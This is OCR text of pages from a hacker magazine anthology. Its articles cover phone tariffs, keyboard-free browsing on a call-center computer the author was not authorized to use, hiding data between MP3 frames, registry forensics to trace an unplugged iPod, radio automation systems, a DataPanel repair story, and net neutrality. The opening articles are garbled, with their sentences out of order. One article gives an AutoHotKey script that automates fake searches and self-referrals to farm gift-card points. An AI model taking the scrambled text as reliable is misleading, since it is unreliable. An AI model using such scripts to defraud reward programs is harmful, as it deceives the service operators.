. either to win a new subscription or to stave off a cancellation.com/ser ➥vicelibrary/consumer/ext/ ➥index.Qwest tariff library • http://serviceguide. their brand name. there is more than one way to skin a cat. you’d settle for nothing less than the maximum. with permanent call forwarding to your regular number. One local plumbing company has over a half-dozen foreign exchange circuits. which bills a hefty setup fee and an even heftier monthly fee (including a mileage charge). understanding which services are in the catalog. On a more practical level. people living in the area with existing telephone service have to be explicitly allowed to maintain service from their existing wire center. and there’s more than one way to have a phone number in a different wire center ring your line in my Central Office.Verizon tariff library • http://tariffs. I can’t advise them that they’re wasting money because the tariff strictly regulates subscriber privacy. And remember that if you wrap your car around a telephone pole despite it all.in my estimation . the other party on her line moved away in the early 1980s after party line service was discontinued for new subscribers. even though foreign exchange circuits almost never make financial sense. I’ll probably retire before I can save these folks a dime. and precisely according to the rates and conditions outlined in the tariff. In effect.net/hawaiiantel/ Hawaiian Telecom tariff library • http://www.qwest. she didn’t really have a two-party line anymore. Deviations are not permitted in any way.

I opened up a browser and pasted that ‘g’ into the address bar. though. I hadn’t given up yet. I found it was disabled. It is surprising what articles you can get to from a seemingly random article. I had navigated to a character map that contained all of the characters I needed. and then become more specific. instead of throwing our hands up in defeat and going on to do something normal.com
This article is not really an example of an exploit. It is tons of fun. I would wait for all of the normal employees to leave and just use whatever computer was left unlocked to browse the interwebs. The object of the game is to use only the links within the random article to navigate to the target article (Linux).’ I was then looking at a description of Notepad. From Science. For example: somehow get to ‘Science’ from the random article. I was then determined that if I could enter text with an NES controller. I especially needed to log into a profile for my physics class. this is the type of story that warrants the “you have too much time on your hands” response.
Wikipedia Game Appendix
19
. The best strategy is to work your way to a general article. fewest number of links to the target. I grabbed the ‘com’ from the word ‘common’ and pasted that at the end. 2. to know what homework I had to do that night. but how would I do that without a keyboard? I still had a working mouse. I clicked the ‘go’ button in my browser and arrived at Google.’ I copied and pasted that word into the Google search and clicked on the Wikipedia article for Unicode. This made me think back to older video game systems with very few buttons on the controller. I rightclicked on the highlighted ‘g’ and copied it. Rather.com. Finally. but many users find Notepad a simple tool for creating Web pages. I went back and copied the ‘oo’ from the word ‘tool’ and pasted the ‘oo’ after the ‘g’ in the address bar. 3. The most common use for Notepad is to view or edit text (.’ Next I copied the ‘le’ from the word ‘simple’ and pasted it at the end of my growing ‘goog’ string.
The idea of the game is to choose a ‘target article’ (say Linux) and then use Wikipedia’s ‘random article’ feature as a starting point.’ from that ‘(. The challenge came one night when the only computer left unlocked didn’t have a working keyboard.VOLUME 26
by XlogicX drkhypnos314@hotmail. or a combination of both. Usually. there were at least three or four computers around the building that were left unlocked. It all started several years ago when I was contracted to work the graveyard shift in a building with many computers. though.THE HACKER DIGEST . So. Obviously. Though there were few buttons. sick of hearing that phrase. Try the game out at your next 2600 meeting.” I had everything I could possibly want. as we all surely are. I played the ‘Wikipedia Game’ (see appendix) to get to the article about ASCII. it is a story on a hacker’s approach to an unlikely challenge. I could do it with a mouse. Towards the end of the help document for Notepad (third paragraph). the first thing I looked for was the character map. Yes. I was able to use this ASCII table to slowly copy and paste my way into the login page for my physics classwork. 5. Opened Notepad. I had arrived at my needed setup. This was the first paragraph: “Notepad is a basic text editor that you can use to create simple documents. it appeared to be a call center. Here is what I did with the XP machine I was at: 1. I highlighted the letter ‘g’ from the word ‘creating’ in the above paragraph. Most nights. But I am. leaving me with ‘google. be it playing a game or entering the name of your character in an RPG. At least we find something creative and different to do with our time.’ 4. Next. you could do so much with them. Went to ‘Help’ -> ‘Help Topics. Linux is cake: something like Science -> Computer Science -> Computer -> Operating System -> Linux. You can play for speed. This article contained a dumbed down ASCII table with most of the printed ASCII characters.txt)’ part of the paragraph. Since I was a contractor. I came across the word ‘unicode. All players should start with the same initial random article. Unfortunately. I didn’t have legitimate access to any of these computers. I copied the ‘g’ I already had in the address bar and pasted it after the
‘oo. I then grabbed the ‘.txt) files.

com) A 757 Labs Effort (www. one can leverage the properties of this format to transmit data that is not heard but can still be extracted. This is merely insurance for protecting the aural pleasure of the listener. This means that. and compare the frame count. Therefore.757labs.
20
. the audio player looks for that special pattern signifying the
start of an audio block. a series of 11 set bits. As a side note.of-band data has the same signature of an MP3 frame header. The audio player then grabs that calculated amount of data and processes it appropriately. the length of the audio data trailing that frame can be determined. If someone is actively looking for such out-of-band data. Each frame consists of a header and appended audio data. is called the “sync frame. any data that exists between frames should not be replayed. Likewise. anything outside of the frame is ignored. Just looking at the number of podcasts floating around. This pattern. The MP3 format has been a relative commonality for streaming media as its underlying structure nicely supports such means of data transfer. and the result can be a rather despicable symphony of squeaks and squawks. This article discusses hiding and transmitting information within an MP3 file that can be later streamed or downloaded. the ability to disseminate information has become relatively common. 3]. or stream. Since each audio frame has a header with a special signature. 7]. or why partially downloaded MP3 files can still be played. someone might analyze the audio file. if the audio player tries to play all data. the length of the audio data can also be determined [1]. Once a frame header is obtained. and ID3 information tags to the actual file size.VOLUME 26
MP3 Data Stream as a Covert Means of Distributing Information
by enferex (mattdavis9@gmail. hiding information between frames is a quick and easy means to stash away data. one can see the variety of information being spread. such as bit and sampling rates. On the other hand.
3 Hiding Information Since audio players are only concerned with replaying audio data. furthering the expansion of musical interests and introducing new ideas to the masses.” and each frame in the data stream contains it. the audio data is encoded and decoded via the Huffman encoding scheme [2. four bytes. Whether through internet radio or downloadable tracks. if an audio player is implemented correctly. provides information. For instance. An MP3 can be made up of thousands of these frames. frame sizes.com) 1 Introduction One of the great things about the collective brain of the internet is the amount of information that can be exchanged as events occur in the tangible world.THE HACKER DIGEST . By applying proper mathematical calculations to the data in the frame’s header. it is easy to find. or if the out. some rather obnoxious sounds might emerge. This header allows an audio player to appropriately reproduce the correct sounds. Likewise. 2 Frames An MP3 file is nothing more than a series of frames. chances are that there is some extra data hiding underneath the covers. new music and other audio tracks can be consumed. which describes the audio data that follows. While not truly a form of audio steganography. which is the primary reason why streaming MP3 audio works. However. If the sizes do not correlate properly. Any data outside of the frame can be ignored. true forms of audio steganography rely on actually hiding information in the audio bits themselves [6. This small header. information can be hidden by placing it between audio frames. Thinking such out-of-band data is something that can be heard is a gross assumption.

2001. 17 January 2008. 2001. which increases the original file size. What would happen if one were intentionally hiding information between frame headers. the seven-bit encoded data produced can be compressed. “Aww man. lots of large pauses. it must be that chick Roxanne sending me emails about how I can improve my performance. this is great! Ohh wait.Wikipedia. the main focus of development shifted from data detection to actual data hiding and recovery. However. 6 August 2008. assume one were distributing this perfectly legit movie using a perfectly non-legit audio file. a sync frame would never appear. 19 July 2008.g. Such an encoding scheme should never produce a stream of 11 bits all set. For instance.Frame Header. Accesed on 15 August 2008.ital Storage Media at up to about 1. Such cases can be avoided if the data never contains any pattern that looks like a MP3 sync frame. In fact. could be to bypass firewalls that prevent access to outside email (e. audio players look for a signature that prefixes and describes a following block of data. for some reason. Sting again. In other words. it is simple to do. Certain portions of the remaining 21 bits of the header can be used to validate that the frame and following data is audio. http://www. ➥com/en/wiki/MP3 [4] ASCII. http:// ➥en. However. [6] Fabian Petitcolas. MP3’ Tech . the stars all align properly and the hidden data just happens to look like a valid MP3 header. However. for example a completely legit HD-quality video. Plain ole’ ASCII text is a perfect example of such an encoding. http://en. bit rate/ sample rate values). a 4GB movie would take quite a while to distribute.g. MP3’ Tech. Such a signature begins with the first eleven bits all set. Such a method allows for data to be quickly extracted as the media is being played/ streamed. Coding of Moving Pictures and Associated Audio for Dig. and now this tool can covertly pack data into a series of MP3s for distribution. rather than in the audio itself. for humor. that block of data might be played as audio. both static and streamed. they probably would not want to stuff it all into a three-minute/3MB audio file. if the audio tool did not do the proper calculations on data in the header (e.Accessed on 27 July 2008. So it is of importance that anyone trying to stuff data between frames not replicate such a signature.org/hacks/mpeg➥drafts/11172-3. Even cooler would be to associate email-senders to a particular musical artist and stream that data.” References [1] Bouvigne. if one can avoid passing an entire byte with all bits set.petitcolas.” In fact. It is not a compression technique. as it only uses seven bits of data to encode characters [4].
5 Conclusion While the method of hiding data between frames. 22 Novermber. Accessed on 15 August 2008. especially if it were encoded using uuencode. if someone desired to covertly distribute a movie. The uuencode tool helps with this trick. One potential use for this technology.org/programmer/frame_ ➥header. After some time. we needed to inject data between frames so that we could verify that the tool was working properly. It should be mentioned that seven-bit encoding of raw data will result in a file larger than the original. “Wow this song is really boring. ➥ mp3-tech. mp3stego. Not to mention that the three minute song would be of a curious size. ➥ net/fabien/steganography/mp3stego/ [7] Mark Noto MP3Stego: Hiding Text in MP3 Files SANS Institute. and a segment of that to-be-hidden data contained the same bit-signature as a frame header? Well. sync bits and all. transforming standard binary machine encoding into seven bit ASCII encoding[5]. is less a testament to steganography. 25 July 2008. Such a case might also occur if.wikipedia. One simple solution is to encode the data beforehand in a manner that will not mimic a sync frame. chances are that the data is out-of-band. The original intent of this application was to analyze MP3s.html [2] MPEG. however outlandish it might appear. Wikipedia. Wikipedia. if a particular bit sequence is defined that does not equate to a valid bit rate or sample rate.VOLUME 26
As previously mentioned.pdf
4 Tool: mp3nema The mp3nema tool has been produced to aid in stuffing and extracting data between frames. testing such analysis required that a valid test case be created to assure detection. http://www.
21
. 1991.wikipedia. streaming of uuencoded email in tracks of music).
[3] MP3. Gabriel. Accessed from
http://le-hacker. ISO/IEC.com/en/wiki/ASCII [5] Uuencoding.5 MBIT/s Part 3 Audio (Draft).THE HACKER DIGEST . for out-of-band data.

The cleaning staff came through at 6 pm and was usually done by 8 pm. Here is what I found that works under XP Pro SP2. not removed. I realized that I had left my iPod sitting on my desk plugged into my Mac. If anyone was there then they would have looked awfully suspicious. significant happenings with block devices. Damn. Windows is the dominant OS and is likely to remain that way for a while. The logging on Windows isn’t that great. There were a few guys that might have found it funny to alarm me (and probably owed me for messing with them in the past). Since I knew what time it happened and since it was at night. especially in a noisy office. he lost his job. and the iPod was subsequently removed.THE HACKER DIGEST . The time at which an iPod was unplugged cannot be determined if the user was logged in. She explained that it was a member of the cleaning staff that had come back after his shift to steal electronics. and the iPod was removed. and the iPod was subsequently removed. There is a girl that sits a few feet away from me in her cubicle and talks to herself all day.-) It wasn’t the first time an iPod had been stolen at my office. I am usually very careful to protect my iPod. logged out. The following morning when I arrived at work. given that my workplace is relatively safe. her constant chatter is maddening. and it wasn’t the last either. I gave her a call to ensure that the key card access logs got reviewed and that the security camera recordings were preserved. the manager of the physical security group stopped by and returned my iPod unharmed. The things are like little stacks of cash laying around waiting to be taken. Because of this. About half
an hour later they called to tell me that they know who did it and would handle them later that day when they were scheduled to work. I found a way to get the same results on Windows XP. there are honestly days when I could quite possibly lose it. Then it struck me that I had a critical piece of information sitting in my lap that just might get the iPod back in my hands. .) But alas. When did I leave the office? Who was still working as I was leaving? Maybe it was just a prank. given the right circumstances.VOLUME 26
(or catching an iPod thief using forensic analysis. Security said that they would get back to me. I wasn’t too concerned when. Sure. the iPod was removed. The moral of the story is that stealing music is wrong. so my first reaction was to start putting together an incident timeline. are logged by default. logged back in. and Unix creates log entries when a hard disk is unplugged! Sure enough. For most Unix-like systems you can find these in /var/log/dmesg (or by running the dmesg command. My iPod was plugged into a Mac. He immediately returned the iPod but. In XP Pro. Nothing. but since I knew their manager.log had a bunch of the following messages:
Sep 10 22:31:23 computer kernel[0]: ➥ disk2s1: media is not present. He was given the opportunity to return the stolen property or face charges. on my way home after work.
Don't Steal Music!
So I called up the physical security folks and let them know that there was a theft.)
by frameloss
Music is important. I was half way through my first cup of coffee before I realized that my music player was gone! Of course. Unix users have it easy. Of course. since I always misplace things. it is configurable. such as hard drives. Key card logs and corporate video surveillance may have been useful for the first time known to man. but does not work on Vista. It also seems to work on SP3. • User was logged in. Without my headphones. and the system was subsequently rebooted because the “HKLM\ SYSTEM\CurrentControlSet\Control\DeviceClasses” registry tree appears to be dynamically
22
. However. However. I assumed that it would be pretty easy to figure out who did it. the /var/log/system. As if it wasn’t bad enough to be stuffed into a cubicle. • User was logged in. but it somehow never seems to have the right settings to make this type of work easy. I work in IT security. of course. Sweet. The next morning. So there should have been no one in the office around the time my iPod grew legs. you can already guess what happened next. For this reason. where you can only get the last time an iPod was synced. the time at which an iPod was last plugged in and the time at which it was unplugged can be determined in the following cases: • User was logged in. I asked around. I spent the next half hour tearing my cube apart looking for my iPod. but everyone I spoke to denied taking my iPod. logged out. The system was not shut down. I decided to do a bit more research and find out what it would take to get the same forensic results from a Windows machine.

and you should be able to see when the registry key was last written. • -i:reg instructs logparser to use the system registry as the source. This allows for easier analysis with a spreadsheet program. and it is important to see the errors in case you are not seeing all of the necessary data.
Opening the CSV file in your choice of spreadsheet program will allow you to sort the data by access time. I hope you are as lucky as I was and get your iPod back. and Services) which is why the query is performed at such a high level within the registry.THE HACKER DIGEST . It looks at all values in the registry. So. • -o:csv specifies that the output should in comma separated value format. • -e:1000 instructs logparser to quit after 1000 errors (a number intentionally higher than is likely to happen in such a restricted query). with SCSISTOR for SCSI) have been connected and experiment with the name assigned by the device manufacturer to find the evidence you need. substitute an appropriate value for <hostname> listed above.csv
You should. such as a USB thumb drive. surrounding the string “iPod”. This is when the device was unplugged. • > outfile.VOLUME 26
rebuilt at boot time. This is done using the logparser tool from Microsoft. Be sure to encapsulate whatever string you need with single-quotes and percent signs as shown in the above example. Next you can perform the log query:
logparser -i:reg -o:csv “select ➥ * from \\<hostname>\HKLM\SYSTEM\ ➥ CurrentControlSet\ where path ➥ like ‘%iPod%’ order by lastwritetime ➥ desc” -e:1000 > outfile. you can tell when a device was removed. Sort by descending timestamp.csv specifies the file name where information will be stored. You can view the HKeyLocalMachine\SYSTEM\CurrentControlSet\Enum\USBSTOR\ area of the registry to see what other removable USB devices (or substitute USBSTOR. ENUM. as long as the system was not shut down. • The string ‘%iPod%’ can be changed to represent another device. If you plan on doing the procedure remotely (which will result in less overall changes to the system when compared to logging in as a user interactively). you will need to perform the following command from a CMD. too!
Available at booksellers worldwide including http://amazon. then errors will not appear in the output. It then returns it sorted in a list with the most recent entries first.
Command options explained
• HKLM is shorthand for HKeyLocal ➥Machine. • To see what other fields can be queried you can run logparser -i:reg -h • There are three subkeys below CurrentControlSet that contain relevant information (Control. once again.com/2600 23
. where the pathname (not actual key values) has the text iPod.exe shell on another host before beginning:
net use \\<hostname>\ ➥ ipc$ /u:<administrator>
Substitute appropriate values for the <hostname> of your machine and the <administrator> account name. Also any line breaks should be removed when running the actual command. If logparser is not given this instruction. • select * from \\<hostname>\HKLM\ SYSTEM\CurrentControlSet where path like ‘%iPod%’ order by lastwritetime desc is the actual query.

The audio can either be in an . etc (normally called “Production” or “prod”) • And last. Stations would then use this information and display it on their web site. for the most part. it sends the audio to Dispatch. dMarc released a version of the “Agent” that also allowed local stations to send their traffic logs. places metadata. all of the computers are connected to the Internet. dMarc released software called the “dMarc Agent. to the California server. an automation system that became widely used around the country. Google now calls this program “Audio Ads”.” which would provide real-time diagnostics and information from local stations to a central server. Dave Scott. TLC converts the file format. Now there are as many as three copies of the audio on the network. spots. This may be one of the biggest mistakes a station can make. “Dispatch” • A system that pre-records jock breaks called “Voice Tracker” or “VT” • Any computer that sends pre-recorded material like songs.VOLUME 26
by hypo
If you’re listening to a radio right now. The support that Google offers in amazing. developed the SS32. but not least. dMarc would send down audio and schedule it into the local station paid national advertising spots. The SS32 offers solid 24/7 performance at a fairly reasonable price. and assigns a user-managed cart number into the system. there’s a good chance you’re listening to a computer’s sound card pushing out audio from an automated program we in the business like to call “automation. let’s first look into why Google would want acquire radio automation software. which can run music scheduling software and the “Audio Ads” program as a proxy. This was a win for dMarc. who made money for playing the ad. automation systems have been put in all over the country to offer a cost-effective way to provide programming to the audience. Some other office computers. All of these computers are hooked into a network. Some of the local information was the title and artist of the song being played on the air. Shortly after the acquisition. Shortly after. After TLC does its thing. This makes the experience
The Basics
24
. designer and owner of Texasbased Scott Studios. it is good enough to get another “Green Machine” get sent to you from Google. We all know that can never happen. then copies the audio to the SS32.mp2 or . Some smarter stations create a separate LAN that all of the computers on the audio network are hooked into. former users of the SS32 system. In some installations. which makes a copy of the audio on its local hard drive. Although this is not recommend on a long-term basis. Audio gets ripped into the system by a program called Trim Label & Convert (TLC). The backup can run the audio through the network via Dispatch. In the early 00s.
History
A basic installation of an SS32 system at a local station relies on having 4 computers: • A server-like system called. right? When the SS32 does get hosed. which include items like commercials and public service announcements.THE HACKER DIGEST . Scott Studios was purchased by dMarc Broadcasting of California. the on-air “SS32” computer. Is any of this starting to sound familiar? The inevitable acquisition of dMarc was soon made by Google. the audio can get fed to a backup SS32 machine. both of which are proprietary to Scott Studios/dMarc/Google. as well as for the local station. If there were any holes in the traffic log (filled by nonpaying items like PSAs). who made money on the ad’s sale. one for the audio network and the other to the Internet. have two NICs. Before we get into the guts of the actual system. a close cousin to it’s hugely popular AdSense web-based ad placement system.” Since the late 90s.wav file format. All of the audio ultimately gets sent to the SS32 box via the Dispatch server. The people who pick up the phone are. This can come in very handy when the SS32 has some type of catastrophic failure.

go to: http://www. The first thing I would like to say is that you will not (to my knowledge) be able to “earn” the $25 in one day. html Is you favorite station running “The Agent”? http://stations. These folks will stay on the line with you until the problem is fixed. I learned a lot. I tested this with a demo of “Workspace Macro 4. though. You get 100 points for downloading their toolbar.com/radio ➥automation/index. ➥scour. This generates the “random” searches. X” for the script. which we need anyway. In fact. it will always be the same location. We’ve heard this before. until I get mine. So. In the process. You can also plug in your time zone (tz). you will need a tool that allows you to run macro type functions on your PC. Make a note of your “In Active Window: X. in a support center in Texas. the Scour toolbar. but I quickly ran out of uses. Name it.dmarc. artist (A). and there is a “500-point personal cap” on search points per day. “AutoHotKey. There is. you will need to find the location of your Scour toolbar. A friend mentioned a cool tool he uses daily. sorry Charlie. There are people on the site that claim to have gotten their gift cards. though I haven’t checked to see if you get points for your friends’ friends’ friends. or song title (S) modify the “&a=” argument. and a macro type tool. Then click in the toolbar for Scour. During the day there are many techs on call. Third. for simplicity.VOLUME 26
on a local level so much easier. a new web site called Scour launched. and select Window Spy. however. They caught on pretty quickly to tricks.com and set up your account. so this may seem basic to some readers.org.THE HACKER DIGEST . like an MLM scheme. who will call you back in as little as 20 minutes. and with it the promise of getting paid to search and comment. Up until that point. though.google. I saw this as my opportunity to make a small contribution to my newly found 2600/ hacker world. Please keep listening to terrestrial radio. keeping the AHK extension.google. I used this because it was free. This way if your browser likes to move around (like IE).aspx?c=WXYZ➥FM&tz=EST&n=1&a=TAS Replace WXYZ with your favorite station and replace “FM” with “AM” if need be. If requests to get more in-depth information on Google Radio come in. Lastly.com/radio ➥automation/productshardware.
References
Scour: Paid to Search. I will be more than willing to offer it up. I am still new to the scene. Right-click that file and choose
25
. while at night there is at least one tech on call.html And Google’s “Green Machine” is here: http://www.com.net/ ➥Console/NextPlays.autohotkey. do a few test searches to be sure your points are accumulating. offered me a chance to learn something new (scripting). If you get caught and kicked off the site.etext. In late June. other than the gift card you can gain some (albeit minor) scripting and automating processes knowledge. Start a new AHK script by right-clicking and then choosing “New>AutoHotKey Script” from the Menu. an unlimited number of referral points. I found it most effective. in the late 90s with ad sponsored. If you want to display any combination of the the time (T). You are going to need three things: a text editor.6”. and am still learning as I write. Once your account is set up. and your browser.” which is available at http://www. Again?
by D4vedw1n
This article started out as my attempt to try to beat a system through the use of various tools. I downloaded a book for length from www. I remain skeptical. Launch AHK. Please note. free service providers. Calls of more than 3 hours have been logged by yours truly. The text editor I used was Notepad. For the toolbar. Second. Google Automation Home is here: http://www. and the toolbar running. and most importantly got the job done (thanks Chad). that Google is now offering a new version (6) of the system which may or not have the components in the network described above. Right click on the AHK icon in system tray. After installing AutoHotKey (AHK). I learned enough that I felt compelled to write this.

Location ➥ for Active Window numbers Send ^v Winwait. Save a copy of the existing database.. and the software downloaded and installed easily. So set up one or two more. Was it available from GE? Sure. and use the script on their accounts. I downloaded the user manual as well.. right? First off. Pathetic poking and probing at port and program produced piffle. or AOL. Below are the nuts and bolts of the script. but think that is a max. The DataPanel was in the Control Room. Was trial-and-error an option? It was now. 2 . and would be used to replace a failed unit at a remote location. Was it all going to be this easy? Of course not.Move off the highlighted text .Replace with the ➥ name of your document . and set up the script so that it matches your setup. That will make your account activity appear more genuine and.Set focus to Document WinActivate Untitled ➥ Notepad . too. You can also make it repeat as many as you want (remember.Highlight the text Send ^+{right}^+{right}^+{right} . Internet.10 Send {Enter} Sleep 10000 WinClose } To get points from your “referred friends. Internet. Was there a copy onsite? Of course not. but we are looking for the points from them.Change ➥ Internet to name of browser Click 130.. Did anyone have one? Of course not. MSN. 111 . Leave the template in there and enter the script. and Windows NT”. one needed to be in “Off-Line” mode. YahooMail. I started the transfer and received the error message: “Cannot Initialize Port”. because no one is innocent. you may actually start to like the social searches.10 .) by changing the loop count. You will want to change the document title from “Untitled Notepad” to the document you are using (found in title bar).Launch Browser SetTitleMatchMode. Took a closer look at WinCFG (the name alone should have warned me) and saw “Windows 95. If you are like me and have several email addresses. Was there a default password? Not that GE would say. To get into “Host Transfer” mode.
Battling the Fanuc DataPanel
by scamorama
The following is true. and the range is 000000999999.Clears clipboard and copies ➥ text for search to clipboard clipboard = Send ^c Clipwait . the DataPanel needed to be in “Host Transfer” mode.. Use Communication Protocol 80: Modicon Host Slave in the new database. The task appeared simple: replace a database on a GE Fanuc 1062 DataPanel using GE’s proprietary WinCFG software running on a laptop. In order to transfer files. if I didn’t mind waiting an hour. Could I get one? Sure. There are bonus points for referring people. With the DataPanel in “Host Transfer” mode and the laptop connected. and the browser you are using (I was using IE 6).exe Winwait. That’s it. 500. it was time to transfer the existing database for safekeeping. Then run your edited script: Loop 3 { . who knows. Open notepad. Windows 98. No problem. or your e-text document. The customer’s locked-down Windows XP Professional laptop was not going to allow it
Monday
26
. Got it at 111. No names were changed.VOLUME 26
edit. which required a password. you can refer yourself. I still need to test the MLM-type points and will update with a letter if I get it to work. But it was only an hour. Launch AutoHotKey (it will show up in the system tray as a white “H” in a green square.helps ➥ with the WinWait command below run iexplore. The passwords are numeric. I would recommend throwing in some “real” searches with comments. ➥ OpenOffice left and right
➥ act funny so choose Send {left} .If using Word.” they need to be in your contacts for either Gmail. Did anyone know the password? Of course not. there was the need for the software. use right. if one had a Customer Identification Number.THE HACKER DIGEST . I got 200 points for inviting 2 friends.

Thursday
27
. Was there a suitable laptop onsite? Of course not. There were no screenshots of what one might expect to see. yes. While doing this. It looked good when it came up. No error message! Had I won? Of course not. Everything looked good. Connected it to the DataPanel.” Did it tell me how? You needn’t ask? Poking around in WinCFG revealed that. assumed that WinCFG was smart enough to know where the file was). Did I consult the manual? Of course not. Was I out of the woods. No transfer. which showed that. I tried to RTFM. After a few dead ends. So much for password security. DOS could be entered directly from the DataPanel access screen. It turned out there are two flavors of a 1062 DataPanel: vanilla —1060/1062. No database file on the C: volume.
Wednesday
Tuesday
Copied the database that I had checked the previous day to the 600X. “You can modify an existing database for a different DataPanel. I actually got a usable report. Was I surprised by this? Of course not. Rebooted the DataPanel. Connected it to the DataPanel. Rebooted the DataPanel and put it into DOS mode. I opened the Communication Configuration in WinCFG and looked at the available choices. put it in “Host Transfer” mode. if the database was open. Did I have my 600X with me? Of course not. No progress bar. I started the transfer and got the error “Database Type Does Not Match DataPanel Type”. renamed the new database file. The manual said. Before I continue. I opened the database. Started the transfer. configured it to use Communication Protocol 80: Modicon Host Slave — as I was told — and saved it. Restarted it and was surprised to see that the old database could communicate. Configured the database with Protocol 91 and transferred it. Was there another volume? You bet! The database was on D: (I. No output to the PLC. I opened the transfer window. It worked! Was I finished? Of course not. Took the panel to its new home and hooked it up. Did the manual give any clue? Silly question. Copied the database file to C:. I had a vanilla database and a pecan DataPanel. After a few more dead ends. rebooted the DataPanel. rather stupidly. it was now time to put the new one in its place. but little about English. Restarted the DataPanel and got the same result as the day before. I had a good database. and checked the communication protocol to see that it matched. So. Poked and peeked in the selections to see if there was a way to generate a report on the database showing the input/output addresses. and was elated to see the progress bar. but the FM was no F good. This was obviously the product of a technical writer — someone who knew a lot about software. bad news: the page had inputs only. It appeared to have been translated from the original Sanskrit by an Urdu-speaking Italian. indeed. Seemed a logical starting point. no examples of how to perform any task. Brought in my ThinkPad 600X (running Win98SE) and installed WinCFG. Is the customer always right? Of course not. no outputs. But was it all good? Of course not. either. a few words about the user manual. I booted the DataPanel into DOS. didn’t you?) nothing on it worked. and only the most minimal of glossaries. Was I ready to give up? Of course not. and opened the database I had installed.THE HACKER DIGEST . Transferred the database that I knew was good and that had the requested protocol. had I figured this out? Of course not. I couldn’t connect and test the DataPanel until the following day. I made an interesting discovery. Did anyone know where it was? Of course not. Initiated the database transfer.VOLUME 26
to communicate. Turned the power on. Booted the DataPanel into DOS and deleted the now-suspect database. Changing the extension on the database file on D: to something other than what was normally expected resulted in the DataPanel booting directly into “Off-Line” mode. Consulting it for guidance on any topic was an exercise in masochism. but (you knew there was a “but” coming. I managed to come up with a way to get a report. I installed WinCFG on the desktop I’d been using. and I’d configured it with the Communication Protocol requested by the customer. the database had the addresses it needed. Found Protocol 91: GE Fanuc Genius. Good news: the old database had a page that duplicated the new database. selected the new database. It worked. More digging was required. and copied the old database file from the C: volume. I sat back and considered what was in front of me. With the original database safe on the 600X. the “Save As” function provided the needed selection. and pecan —1060/1062 Extended Memory.

net
Over the past few years. Your ISP. independent. very basic primer on net neutrality. One day in the not-so-distant future. image/multimedia sharing community. Since it is important that we don’t let this issue (along with the beloved Internetz) fade away. oddly enough. acting as a gatekeeper to the Internet. This made it so. doesn’t it? Well. there’s not much browsing to be had.VOLUME 26
Intro
What It Is
of network neutrality is what prevents this sort of scenario from happening. the FCC changed the classification of DSL and Internet services connected through the phone network. etc. you’ll fire up your DSL connection. open your web browser (well. The issue has become a highly politicized one. been exempt all along since they did not operate via the phone network). and/ or personal websites (like 2600. there’s probably only one telephone company in your area to offer DSL. regardless of where a telegraph came from. I mean it predates the Internet itself. Since DSL and dialup Internet connections operate through the phone lines.org. Of course. and where we go from here. but every potential service you’re looking for. but in turn negatively impacts the consumer and the function of the Internet as a whole. cable Internet companies. control. and based on how much you’re willing/able to pay each month determines what you have access to (similar to cable/satellite television – the more you pay. who it was going to. numerous congressional proposals to enforce network neutrality have been made. and the cable Internet alternative doesn’t have much better service plans either (or maybe offers much worse!). Meanwhile. such as Hands Off The Internet. Since the reclassification. the media attention that network neutrality once garnered has all but faded away. Sounds like a terrible vision of Internet-future. they were initially subject to the federally mandated net neutrality concept that the rest of the telephone network was subject to (cable modem Internet services have.netcompetition. or what its contents were. or discriminate against content or traffic.handsoff. if your ISP decides to serve them to you at all. where we currently stand. Maybe you want to catch up on the latest news and find out what’s happening around the world.phonelosers. your email provider. effectively making these networks exempt from network neutrality. has determined which sites and services are going to be available to you. Not only is this sleazy. Or maybe your ISP has set up a tiered pricing plan. Fox Entertainment Group has paid a hefty sum to your ISP. the browser of choice as determined by your ISP) and start browsing the net — but unfortunately.Network Neutrality Simplified
by linear United Phone Losers http://www. what applications they want. http://www. This also applies to parcel shipping services. Both of these are conveniently funded by those
Where We Stand
28
. The Internet user should decide what sites he or she visits. The phrase “network neutrality” is a (relatively) new term for an old concept: no one should be able to regulate. This opened the door for telecommunications companies and broadband providers to start scheming about how they can provide service to their users in a way that benefits them the most (primarily in the financial sense). and all common carriers and public utilities. Well. http:// ➥www. the concept
THE HACKER DIGEST . and how the user is able to connect. In 2005. and telecommunications providers in general are busy feeding misinformation to anyone who will listen. They’re going so far as to set up fake “grassroots” organizations to oppose net neutrality. but it is a direct betrayal to these companies’ obligation to the consumer. that is. making Fox News the exclusive provider of news to all subscribers of your ISP. as far back as the late 1800s. Don’t want your news delivered by Fox? Better shop around for a new ISP that has been paid off by a different news organization. all telegraphs were sent impartially and in the order they were received. the more channels you get). so they’ll be served to you a little more slowly.org and NetCompetition. those websites can’t afford to pay big money to your ISP. What about those private.com)? Well. and most of them have been defeated. I wanted to offer this quick. the telephone network. what services are used. However. the threats to net neutrality are still very real. will all be determined by your ISP. It doesn’t stop at just news. and these threats are putting the future of the Internet as we know it in danger. the telecommunications lobby. And when I say the concept is old. The search engine you use. social network. The concept was applied (and federally mandated) to the telegraph service.

R. and businesses in favor of network neutrality. Free nawleed!
Other Resources
Now What?
Closing and Obligatory Greetz
29
. http:// ➥www. and serve solely to misrepresent what net neutrality is and what its proponents are trying to accomplish. Here are just a few examples of what we can do to help ensure that we win the fight: • Contact your elected officials and make sure they support legislation in favor of network neutrality.com Coalition’s website. Their intent is to prevent any attempt that would write network neutrality back into law. without providing a means for the consumer to be aware of what to expect when purchasing services. like the one found on the • SavetheInternet. but it’s a battle we can win. in favor of network neutrality. trade group.savetheInternet. the act in favor of network neutrality. free. 5353) • Sign petitions in order to ensure those making decisions understand public opinion on net neutrality. s1acker. The good news is that it’s not too late. • A Guide to Net Neutrality for Google Users. Service providers’ and the FCC’s legal roles still have not been clearly defined. Not only did this violate network neutrality but. vixen. This restriction was not limited to material thought to be in violation of copyright laws. o p e n c o n g r e s s .VOLUME 26
companies that stand to benefit/profit the most from a lack of neutrality. that is not funded by any corporation. are anything but grassroots. http://www.com Coalition. people’s Internet. such as the “Internet Freedom Preservation Act 2008” (H.
